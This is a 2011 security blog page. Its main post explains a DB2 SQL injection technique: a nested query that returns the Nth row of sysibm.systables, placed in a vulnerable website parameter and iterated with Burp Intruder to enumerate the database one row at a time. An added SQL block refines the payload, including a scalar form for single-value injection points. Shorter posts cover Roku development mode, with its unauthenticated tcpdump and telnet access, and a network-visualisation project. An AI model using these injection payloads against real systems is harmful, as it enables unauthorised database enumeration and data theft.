2011-09-13

DB2 SQL Injection : Select the Nth row without cursors

Well, I've looked all over the net for this solution and could not find an answer, so after much trial and error I built my own. Let's say you need to query one row at a time from DB2, you cannot use cursors, and specifically you need to query sysibm.systables. I came up with the following solution; there may be a more elegant way, but this worked.

select * from (
        select * from systables order by name asc fetch first 1 rows only
) as G order by name desc fetch first 1 rows only

select * from (
        select * from systables order by name asc fetch first 2 rows only
) as G order by name desc fetch first 1 rows only

select * from (
        select * from systables order by name asc fetch first 3 rows only
) as G order by name desc fetch first 1 rows only

...

...

select * from (
        select * from systables order by name asc fetch first 1000 rows only
) as G order by name desc fetch first 1 rows only

I put the query below into a vulnerable parameter sent to a website and used Burp Intruder to iterate through each row by incrementing N.

select * from (
        select * from systables order by name asc fetch first N rows only
) as G order by name desc fetch first 1 rows only

The query works by first requesting the first N rows with the data ordered ascending, which puts the Nth row at the bottom of the result set. The outer query then orders that result set descending, so the Nth row is now at the top, and fetches the first row. The result set therefore contains exactly the Nth row without any cursor being defined. One caveat: the sort key must be unique, or the two sorts are not guaranteed to agree. If two rows tie on NAME (the same table name under two different creators, for example), DB2 is free to return them in either order, and incrementing N can then skip a row or return the same row twice. Ordering by a key that is unique for the table avoids that.
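The following is an added example, not code from the original post. It shows the same Nth-row technique with a deterministic sort key, then the shorter equivalent using ROW_NUMBER(), which is the "more elegant way" on DB2 versions that support OLAP functions (DB2 LUW 9.x and DB2 for z/OS 9 and later). It assumes sysibm.systables has CREATOR and NAME columns, as it does on DB2 LUW and z/OS; the row index 7 is an arbitrary stand-in for N.

```sql
-- Added example, not from the original post. Assumes DB2 with ROW_NUMBER()
-- support and a SYSIBM.SYSTABLES with CREATOR and NAME columns (LUW, z/OS).
-- The literal 7 stands in for N, the row index being iterated.

-- 1. The post's double-sort technique with a sort key that is unique per
--    table: (creator, name). ORDER BY name alone can tie across schemas,
--    and a tie makes the ascending and descending sorts disagree.
select creator, name from (
    select creator, name from sysibm.systables
    order by creator asc, name asc fetch first 7 rows only
) as G order by creator desc, name desc fetch first 1 rows only;

-- 2. Same row via a window function: number every row once in a fixed
--    order, then pick row N. N appears exactly once in the payload, which
--    matters when it has to fit inside a single injected string.
select creator, name from (
    select creator, name,
           row_number() over (order by creator, name) as rn
    from sysibm.systables
) as G where rn = 7;

-- 3. Scalar form for injection contexts that can reflect only one value
--    (for example a string concatenated into a single output column).
--    SYSIBM.SYSDUMMY1 is the standard one-row dummy table.
select (
    select name from (
        select name, row_number() over (order by creator, name) as rn
        from sysibm.systables
    ) as G where rn = 7
) as nth_table from sysibm.sysdummy1;
```

Form 1 is what the post does; form 2 produces the same row with half the sorting and no chance of the inner and outer sorts disagreeing. Whichever form is used, increment N until the query returns no row, which marks the end of the table.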

[Screenshot: Burp Intruder iterating over N]

2011-04-28

Hacking 101 with Tracer-T

This makes me laugh every time I watch it. I still cannot figure out if the kid is joking or serious.

2011-03-27

Roku hidden features.

I finally bought a Roku device today and immediately went looking for development resources. I was surprised to find they have an SDK you can download for free, and you don't need to pay anything to distribute your app as long as you're distributing it for free. You can easily put your device into 'Development Mode', and this Development Mode lets you upload code directly to the device through an HTTP interface and also enables a telnet port through which you can step through/debug the code. I think it's great that you have the option to run the code locally on your own device, or create a private channel so that only a select few can see it, or make it public (i.e. everyone in the world). I'm still new to this, but I can't help but wonder what their app review process is like to ensure malware-like apps are not being distributed; I'll get more into that at a later date.

All of this is cool and I can't wait to make my own channel, but the other really cool trick it can do is act as a network sniffer! It has the option to enable tcpdump, which will cycle through up to 4 dump files. These are all available via its web interface. This could be fun just to leave running for a few days to see what turns up.

Be forewarned: there doesn't seem to be any security around this stuff once it's enabled. No password is required to access any of these features once they are enabled, but you must use the remote to enable them. It's like putting in the cheat codes to old Nintendo games: UP, UP, DN, DN, Left, Right, Left, Right, B, A...

The channel code is written in BrightScript, which is completely new to me. It looks a lot, well exactly, like VBScript. I have never been a big fan of languages that don't end lines in semicolons, probably because I started learning programming in C. I was actually kind of expecting something more Java-like. That was more wishful thinking on my part, I guess.

Since it's got tcpdump built in, let's see if I can port RADAR over to it. :P

2011-03-25

Hack Like in the Movies… with RADAR

I have just started a new (possibly open source) project/experiment to perform 3D modeling of network traffic and networking events in near real time. My idea was to give users freedom of movement similar to a first-person shooter (WASD controls) and the ability to better visualize how attacks interact with the network. Some things are just more apparent when you have a different view.

Introducing RADAR

RADAR is written in Java using OpenGL, so it should be easy to port to any system. It has a built-in network sniffer and currently integrates only with nmap. It listens to network traffic and animates information about every device it finds on the network, including open ports, whois, HTTP requests/responses, etc. When complete it will have the ability to record, play back, pause, rewind, and slow down these events in the animation.
RADAR represents all IP devices as 3D orbs and places them in rings that roughly represent subnets; at this point anything that matches on the first two octets goes into the same ring group (this may be refined later). Any orb can be clicked to display detailed information about what is communicating with that host. It shows a parsed view of the pcap data row by row, and when a row is selected the actual hexdump is visible. This is better explained by the video below.

 

Download Coming Soon…

As soon as I feel comfortable with it, I will release a version that any of you out there can try out.